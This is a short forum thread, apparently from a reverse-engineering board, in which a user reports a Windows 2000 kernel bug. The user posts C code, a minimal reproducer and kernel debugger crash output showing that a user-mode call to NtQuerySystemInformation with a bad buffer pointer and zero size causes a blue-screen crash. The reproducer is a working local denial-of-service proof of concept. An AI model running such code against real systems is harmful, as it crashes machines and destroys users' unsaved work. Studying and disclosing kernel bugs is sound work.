Results 1 to 4 of 4

Thread: How to BSOD win2k

  1. #1

    How to BSOD win2k

    By accident I've found a way to BSOD win2k from usermode pretty reliably:

    Code:
    typedef DWORD (WINAPI *NtQSI) (DWORD, void*, DWORD, DWORD*);     // NtQuerySystemInformation
    
     
          byte* buf;
          NtQSI NtQuerySystemInformation = (NtQSI) GetProcAddress(GetModuleHandle("ntdll.dll"), "NtQuerySystemInformation");
    
          if (NtQuerySystemInformation == 0)
          {
                printf("Error: could't get NtQuerySystemInformation\n");
                return -1;
          }
    
          // get required buffer size – BUG, should be (11, buf, 1, &size), buf should hold at least 1 initialized byte
          NtQuerySystemInformation(11, buf, 0, &size);   // ModuleInformationClass
          buf = new byte[size];
    
          // the real call
          dwReturn = NtQuerySystemInformation(11, buf, size, &size);
    NtQuerySystemInformation is supposed to return required buffer size if passed too small buffer - though it apparently tries to write something there even if passed size = 0

    Code:
    *** Fatal System Error: 0x00000050
                           (0xCCCCCCCC,0x00000001,0x8049301B,0x00000000)
    
    Break instruction exception - code 80000003 (first chance)
    A fatal system error has occurred.
    Debugger entered on first try; Bugcheck callbacks have not been invoked.
    
    […]
    
    BugCheck 50, {cccccccc, 1, 8049301b, 0}
    Probably caused by : ntoskrnl.exe ( nt!ExpQueryModuleInformation+c3 )
    
    […]
    
    PAGE_FAULT_IN_NONPAGED_AREA (50)
    Invalid system memory was referenced.  This cannot be protected by try-except,
    it must be protected by a Probe.  Typically the address is just plain bad or it
    is pointing at freed memory.
    
    Arguments:
    Arg1: cccccccc, memory referenced.
    Arg2: 00000001, value 0 = read operation, 1 = write operation.
    Arg3: 8049301b, If non-zero, the instruction address which referenced the bad memory
                address.
    Arg4: 00000000, (reserved)
    XP behaves correctly though, even with uninitialized buffer and size=0.
    Vulnerant omnes, ultima necat.

  2. #2
    Administrator dELTA's Avatar
    Join Date
    Oct 2000
    Location
    Ring -1
    Posts
    4,206
    Blog Entries
    5
    Hehe, cool, nice work.

  3. #3
    Well, it's not crashing anymore.. I guess I was too quick to call it "reliable"

    Edit: found one compiled executable that still "works" (crashes OS) for me, have to take a look at it

    Edit2: Finally, reproduced the crash. Sample code:

    Code:
    #include <windows.h>
    
    typedef DWORD (WINAPI *NtQSI) (DWORD, void*, DWORD, DWORD*);	// NtQuerySystemInformation
    
    int main()
    {
    	DWORD size;
    
    	NtQSI NtQuerySystemInformation = (NtQSI) GetProcAddress(GetModuleHandle("ntdll.dll"), "NtQuerySystemInformation");
    
    	NtQuerySystemInformation(11, (void*)0xcccccccc, 0, &size);
        return 0;
    }
    Attached Files Attached Files
    Last edited by omega_red; December 13th, 2005 at 09:24.
    Vulnerant omnes, ultima necat.

  4. #4
    Nice work. You found a buffer-overflow vulnerability

Similar Threads

  1. BSOD with softice under XP DOS box
    By WaxfordSqueers in forum Tools of Our Trade (TOT) Messageboard
    Replies: 3
    Last Post: June 30th, 2009, 22:29
  2. # Syser causes BSOD
    By nezumi-lab in forum Blogs Forum
    Replies: 1
    Last Post: May 11th, 2008, 01:12
  3. Olly BSOD my PC...
    By Maximus in forum OllyDbg Support Forums
    Replies: 10
    Last Post: January 2nd, 2007, 11:56
  4. Revirgin and BSOD
    By cps530 in forum Tools of Our Trade (TOT) Messageboard
    Replies: 11
    Last Post: March 29th, 2004, 00:49
  5. Win2k -> DS 2.6 BSOD (hal.dll) HELP!?!?
    By Clandestiny in forum Tools of Our Trade (TOT) Messageboard
    Replies: 6
    Last Post: August 11th, 2002, 14:02

Bookmarks

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •